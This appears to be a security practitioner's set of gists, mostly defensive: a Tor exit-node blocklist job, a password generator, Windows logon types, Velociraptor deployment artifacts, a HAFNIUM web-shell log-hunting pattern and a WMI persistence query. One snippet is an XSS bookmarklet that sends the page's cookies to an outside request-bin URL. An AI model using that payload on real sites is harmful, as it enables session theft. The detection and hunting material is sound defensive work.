I hereby claim:
- I am ecapuano on github.
- I am ecapuano (https://keybase.io/ecapuano) on keybase.
- I have a public key whose fingerprint is 2033 7875 F286 D318 5746 A2A7 27D2 E47B 52A3 720B
To claim this, I am signing this object:
```bash
#!/bin/bash
#
# Use 'crontab -e' to create a scheduled job for this. Every 6 hours or so should be good.
# Make sure your blocking software/hardware can access the tor_nodes.txt file via HTTP / FTP / SCP / etc...
#
set -euo pipefail
OUT=/var/www/html/blocklists/tor_nodes.txt
TMP=$(mktemp "${OUT}.XXXXXX"); trap 'rm -f "$TMP"' EXIT
# curl -f fails on HTTP errors; the -s test then stops an empty (i.e. disabled) blocklist from replacing the old one.
curl -fsS https://check.torproject.org/exit-addresses | grep ExitAddress | cut -d' ' -f2 | sort -u > "$TMP"
[ -s "$TMP" ] && chmod 644 "$TMP" && mv "$TMP" "$OUT"   # mktemp creates 0600, which the web server cannot read
```
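As an added example, not part of the gist: the same fetch-parse-publish pipeline with the checks a production cron job needs (address validation, refusal to publish an empty list, atomic rename), run against a constructed sample of the exit-addresses format so it works offline. The sample addresses, the function names `parse_exit_addresses` and `publish_blocklist`, and the temporary output directory are assumptions.

```bash
#!/bin/bash
# Added example (not the gist's code): parse a Tor exit-address list into a
# validated, de-duplicated IPv4 blocklist and publish it atomically.

# Constructed sample in the format served by check.torproject.org/exit-addresses
# (the last ExitAddress line is deliberately malformed).
SAMPLE_EXIT_LIST='ExitNode ABCDEF0123456789ABCDEF0123456789ABCDEF01
Published 2021-01-01 00:00:00
LastStatus 2021-01-01 01:00:00
ExitAddress 198.51.100.7 2021-01-01 01:00:00
ExitAddress 198.51.100.7 2021-01-01 02:00:00
ExitNode 0123456789ABCDEF0123456789ABCDEF01234567
Published 2021-01-01 00:00:00
LastStatus 2021-01-01 01:00:00
ExitAddress 203.0.113.42 2021-01-01 01:00:00
ExitAddress not-an-ip 2021-01-01 01:00:00'

# stdin: exit-addresses text; stdout: unique, well-formed dotted-quad IPv4s.
# Validating here keeps a corrupted or tampered feed from poisoning the blocklist.
parse_exit_addresses() {
    awk '$1 == "ExitAddress" {
        n = split($2, o, ".")
        if (n != 4) next
        ok = 1
        for (i = 1; i <= 4; i++)
            if (o[i] !~ /^[0-9]+$/ || length(o[i]) > 3 || o[i] + 0 > 255) ok = 0
        if (ok) print $2
    }' | sort -u
}

# Publish stdin to $1 via temp file + rename so the web server never serves
# a half-written or empty list; an empty result (fetch failure) is refused.
publish_blocklist() {
    local dest=$1 tmp
    tmp=$(mktemp "${dest}.XXXXXX") || return 1
    parse_exit_addresses > "$tmp"
    if [ ! -s "$tmp" ]; then
        rm -f "$tmp"
        echo "refusing to publish an empty blocklist" >&2
        return 1
    fi
    chmod 644 "$tmp"      # mktemp creates 0600, unreadable by the web server
    mv "$tmp" "$dest"
}

# Stand-alone run on the sample; in the cron job replace printf with
# curl -fsS https://check.torproject.org/exit-addresses
OUT_DIR=$(mktemp -d)
printf '%s\n' "$SAMPLE_EXIT_LIST" | publish_blocklist "$OUT_DIR/tor_nodes.txt"
cat "$OUT_DIR/tor_nodes.txt"
```

The duplicate 198.51.100.7 collapses to one entry and the malformed line is dropped, so the published file holds exactly the two valid exits; a fetch that returns nothing leaves the previous blocklist in place instead of silently unblocking every Tor exit.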
```javascript
// XSS proof-of-concept bookmarklet: leaks document.cookie to a request bin via an
// image request (no DOM insertion needed; setting src fires the request).
// Cookies flagged HttpOnly are not visible to document.cookie and will not be sent.
javascript:var img = document.createElement('img');
img.src = "http://requestb.in/zngmupzn?cookie=" + document.cookie;
```
```bash
# character set to use for generating passwords (quoted so !, #, $ stay literal)
chars='abcdefghijklmnopqrstuvwxyz123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%'
# how many passwords to generate
count=100
n=0
while [ $n -lt $count ] ; do
  pass=''
  for i in {1..12} ; do #### 12 is the password length
    # pick one character using /dev/urandom; $RANDOM is not a CSPRNG
    pass+=${chars:$(( $(od -An -N2 -tu2 /dev/urandom) % ${#chars} )):1}
  done
  echo "$pass"
  n=$((n+1))
done
```
| logon type | description |
|---|---|
| 2 | Interactive (logon at keyboard and screen of system) |
| 3 | Network (i.e. connection to shared folder on this computer from elsewhere on network) |
| 4 | Batch (i.e. scheduled task) |
| 5 | Service (Service startup) |
| 7 | Unlock (i.e. unlocking unattended workstation) |
| 8 | NetworkCleartext (network logon where the password was passed to the authentication package in plaintext, e.g. IIS Basic authentication; the built-in packages still hash it before it crosses the network) |
| 9 | NewCredentials (caller cloned its token with alternate credentials for outbound connections, e.g. RunAs /netonly or mapping a network drive with alternate credentials) |
| 10 | RemoteInteractive (Terminal Services, Remote Desktop or Remote Assistance) |
| 11 | CachedInteractive (logon with cached domain credentials) |
```yaml
name: Custom.CapsSysmon.Deploy
description: |
  A quick and dirty way to download and install sysmon via Velociraptor
# Can be CLIENT, CLIENT_EVENT, SERVER, SERVER_EVENT
type: CLIENT
parameters:
  - name: sysmonURL
    # placeholder; serve the binary over HTTPS and verify its hash before executing it
    default: http://url.to/sysmon8_64.exe
  - name: binPath
    default: C:\sysmon.exe
```
```yaml
name: Custom.Winlogbeat.Deploy
description: |
  Quick and dirty way to deploy Winlogbeat via Velociraptor
# Can be CLIENT, CLIENT_EVENT, SERVER, SERVER_EVENT
type: CLIENT
parameters:
  - name: binaryURL
    # placeholder; serve the binary over HTTPS and verify its hash before executing it
    default: http://url.to/winlogbeat.exe
  - name: installPath
    default: C:\Program Files\winlogbeat
```
```powershell
# A script that will safely remove adversary footholds on systems.
#
# Be sure to replace your observables down below. Be careful not to
# include LOLBINs as they cannot be safely killed this way. Use
# Kill-Threads.ps1 for those.
#
# Used with great success during CF20
#
# Author: Eric Capuano
```
```bash
# Quick tip to find super common artifacts of the HAFNIUM Exchange attacks with nothing more than IIS logs...
# Run this grep pattern against all logs in C:\inetpub\logs\LogFiles\W3SVC1
# (the Default Web Site; the Exchange Back End site logs to W3SVC2 and is worth checking too)
#
# https://twitter.com/eric_capuano
# Quick check for likely successful attacks: the trailing 2[0-9]{2}\s[0-9]+ requires a 2xx
# status, so failed probes (4xx) are excluded.
## Bash (faster) - grep -E is the non-deprecated spelling of egrep; \s needs GNU grep
grep -E -i '((POST.*\/aspnet_client\/)|(system_web\/[A-Za-z0-9]{8}\.aspx|\/ecp\/y\.js)).*2[0-9]{2}\s[0-9]+' *.log
```
```powershell
## PowerShell (Select-String is case-insensitive by default, matching -i above)
Select-String -Pattern '((POST.*\/aspnet_client\/)|(system_web\/[A-Za-z0-9]{8}\.aspx|\/ecp\/y\.js)).*2[0-9]{2}\s[0-9]+' *.log
```
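As an added example, not from the gist: the same expression run over a few constructed IIS W3C log lines and wrapped in functions, so the match behaviour (a 2xx status is required, a 404 probe is ignored) can be checked offline. The log lines, IPs and user agents are constructed, the names `hafnium_hits` and `hafnium_hit_count` are assumptions, and `[[:space:]]` replaces the GNU-only `\s`.

```bash
#!/bin/bash
# Added example (not the gist's code): run the HAFNIUM IIS-log pattern over
# constructed W3C log lines so the logic can be exercised offline.

# Same expression as the one-liner, with POSIX [[:space:]] instead of GNU \s.
HAFNIUM_PATTERN='((POST.*/aspnet_client/)|(system_web/[A-Za-z0-9]{8}\.aspx|/ecp/y\.js)).*2[0-9]{2}[[:space:]][0-9]+'

# Constructed W3C log lines: status 200 on the web shell path means the request
# likely succeeded; the 404 line is a failed probe and must not match.
SAMPLE_IIS_LOG='#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs-Referer sc-status sc-substatus sc-win32-status time-taken
2021-03-03 10:01:02 10.0.0.5 POST /aspnet_client/system_web/aB3dE5fG.aspx - 443 - 198.51.100.9 python-requests/2.25.1 - 200 0 0 15
2021-03-03 10:01:05 10.0.0.5 GET /owa/auth/logon.aspx - 443 - 203.0.113.4 Mozilla/5.0 - 200 0 0 30
2021-03-03 10:01:07 10.0.0.5 POST /aspnet_client/system_web/aB3dE5fG.aspx - 443 - 198.51.100.9 python-requests/2.25.1 - 404 0 2 3
2021-03-03 10:01:09 10.0.0.5 GET /ecp/y.js - 443 - 198.51.100.9 python-requests/2.25.1 - 200 0 0 9'

# stdin: IIS log text; stdout: matching lines (grep -E is the portable egrep).
hafnium_hits() {
    grep -E -i "$HAFNIUM_PATTERN"
}

# stdin: IIS log text; stdout: number of matching lines (prints 0 when none).
hafnium_hit_count() {
    hafnium_hits | grep -c . || true
}

# Stand-alone run; against real logs: cat /path/to/W3SVC*/*.log | hafnium_hits
printf '%s\n' "$SAMPLE_IIS_LOG" | hafnium_hits
```

Two of the four lines match: the 200 on the eight-character `.aspx` under `aspnet_client` and the 200 on `/ecp/y.js`. The 404 on the same shell path is excluded by the status clause, which is what makes the pattern a check for likely successful attacks rather than for attempts.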
```sql
// run against results from Windows.Persistence.PermanentWMIEvents
// https://github.com/Velocidex/velociraptor/blob/master/artifacts/definitions/Windows/Persistence/PermanentWMIEvents.yaml
SELECT ConsumerDetails.Name AS ConsumerName,
       ConsumerDetails.CommandLineTemplate AS CommandLineTemplate,
       FilterDetails.Name AS FilterName,
       FilterDetails.Query AS FilterQuery,
       count() AS Count
FROM source()
// filter common FPs
// (name-only exclusions are easy to spoof; once the benign values are known,
//  tighten each one to name plus CommandLineTemplate / FilterQuery)
WHERE ConsumerName != "BVTConsumer"
  AND ConsumerName != "SCM Event Log Consumer"
  AND ConsumerName != "DellCommandPowerManagerAlertEventConsumer"
  AND ConsumerName != "DellCommandPowerManagerPolicyChangeEventConsumer"
  AND ConsumerName != "CmdLineConsumer_WSCEAA"
// stack identical bindings across hosts so the rare ones stand out
GROUP BY ConsumerName, CommandLineTemplate, FilterName, FilterQuery
ORDER BY Count
```